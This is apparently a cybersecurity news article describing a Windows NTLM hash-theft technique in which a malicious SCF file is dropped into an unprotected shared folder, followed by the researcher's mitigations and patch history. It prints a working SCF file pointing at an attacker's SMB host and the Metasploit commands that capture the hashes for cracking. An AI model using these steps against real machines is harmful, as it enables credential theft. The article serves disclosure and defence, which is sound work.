Sunday, July 14, 2024
EHA

Hackers Can Steal Your Windows Login Credential Without User Interaction using New Windows OS Flow

Newly discovered dangerous Vulnerability in NTLM Architecture allows hackers to steal Windows NTLM password without any user interaction in all the  Recent Version Windows OS.

NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product.

This vulnerability allows attackers can able to steal the NTLM hashes remotely without any user interaction using malicious SCF file that has to be placed in unprotected users windows machine.

NTLM

This vulnerability has 100% attack vector for users who have unprotected shared folder without a password. share folder protected users are safe by this dangerous attack and since windows have default shared folder protection will protect most of the WIndows user.

Worst case is that, this is normal behavior in offices, schools, hospitals and almost all Windows environments, people share folders left open to sharing music, photos, and documents.

How Does Hackers Steal the NTLM hashes

Initially, the attacker will discover the unprotected share folder target victim machine and share the malicious  SCF file(Shell Command File)  to execute some basic tasks.

Since we already have few of  SCF file attacks which required manual user interaction to successfully execute the SCF file for Performing some malicious activities but this flow has required no user interaction.

Here Attacker can be used some traditional method via email to send the malicious SCF file and install into victim machine.

Basic SCF File structure that contains the shell. command file share ad task bar information

Command=2
IconFile=\\192.168.1.101\share\test.ico
[Taskbar]
Command=ToggleDesktop

This Malicious SCF File will be executed using the Metasploit module to capture the NTLM hash form the victim’s machine.

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#
root@sysadminjd:~# msfconsole -q
msf >use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job
[*] Server started.

Once attackers Craft the NTLM hash form the Victims machine they will use some Public availble tool such as John the Ripper  to crack the NTLM  hashes and redrive the Windows Login Credentials.

According to the  Researcher,Diego who Discovered this critical vulnerability have suggested some useful mitigation techniques.

  1. Microsoft created a sort of patch to this vulnerability consisting in changing two registry keys to disable NTLM on the system. This registry keys are available only on Windows 10 and Windows Server 2016, and Microsoft has no intentions to backport to the other versions.
  2. Another issue is that disabling NTLM will break a lot of environments, and that’s a huge concern for them.
  3. My suggestion is to use strong passwords, after the attack we need to crack the hash, that can take a lot of time if the password is complex, and can be frustrating for the attacker.
  4. The better approach, don’t share folders without passwords, that’ll do the trick.
 

He has been reported this vulnerability on MAY 2017 and  finally Microsoft patch this Vulnerability in Oct 2017.

The patch is only for Windows 10 and Windows Server 2016 users. Older Windows versions remain vulnerable to this attack because the registry modifications are not compatible with older versions of the Windows Firewall.

Website

Latest articles

mSpy Data Breach: Millions of Customers’ Data Exposed

mSpy, a widely used phone spyware application, has suffered a significant data breach, exposing...

Advance Auto Parts Cyber Attack: Over 2 Million Users Data Exposed

RALEIGH, NC—Advance Stores Company, Incorporated, a prominent commercial entity in the automotive industry, has...

Hackers Using ClickFix Social Engineering Tactics to Deploy Malware

Cybersecurity researchers at McAfee Labs have uncovered a sophisticated new method of malware delivery,...

Coyote Banking Trojan Attacking Windows Users To Steal Login Details

Hackers use Banking Trojans to steal sensitive financial information. These Trojans can also intercept...

Hackers Created 700+ Fake Domains to Sell Olympic Games Tickets

As the world eagerly anticipates the Olympic Games Paris 2024, a cybersecurity threat has...

Japanese Space Agency Spotted zero-day via Microsoft 365 Services

The Japan Aerospace Exploration Agency (JAXA) has revealed details of a cybersecurity incident that...

Top 10 Active Directory Management Tools – 2024

Active Directory Management Tools are essential for IT administrators to manage and secure Active...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

Low Rate DDoS Attack

9 of 10 sites on the AppTrana network have faced a DDoS attack in the last 30 days.
Some DDoS attacks could readily be blocked by rate-limiting, IP reputation checks and other basic mitigation methods.
More than 50% of the DDoS attacks are employing botnets to send slow DDoS attacks where millions of IPs are being employed to send one or two requests per minute..
Key takeaways include:

  • The mechanics of a low-DDoS attack
  • Fundamentals of behavioural AI and rate-limiting
  • Surgical mitigation actions to minimize false positives
  • Role of managed services in DDoS monitoring

Related Articles